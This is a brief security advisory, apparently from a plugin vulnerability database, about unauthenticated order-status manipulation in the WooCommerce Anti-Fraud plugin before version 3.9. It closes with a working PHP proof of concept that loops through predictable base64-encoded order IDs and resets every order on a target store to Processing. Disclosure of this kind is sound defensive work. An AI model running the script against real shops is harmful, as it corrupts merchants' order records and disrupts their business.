WooCommerce Anti-Fraud < 3.9 - Unauthenticated Order Status Manipulation

The plugin is affected by an issue where an unauthenticated user could change the order status of any order to processing, as there were no checks when changing the order status. The order_id was also predictable.

On an individual level, if you have already received your order, you can set the order status back to Processing, which may have unintended consequences, such as being able to claim that your order has not been shipped yet.

On a bigger level, order ids can be looped from 1 to ++ and every order on the site can be set to Processing, requiring remediation by the owner before continuing business.

<?php
$site = "https://woocommerce-store-with-anti-fraud-installed.com";
for ($order_id = 1; $order_id <= PHP_INT_MAX; $order_id++) {
	$order_64 = base64_encode( $order_id );
	$url = "{$site}/?order_id={$order_64}&paypal_verification=true";
	$handle = fopen( $url, 'r' ); fclose( $handle );
}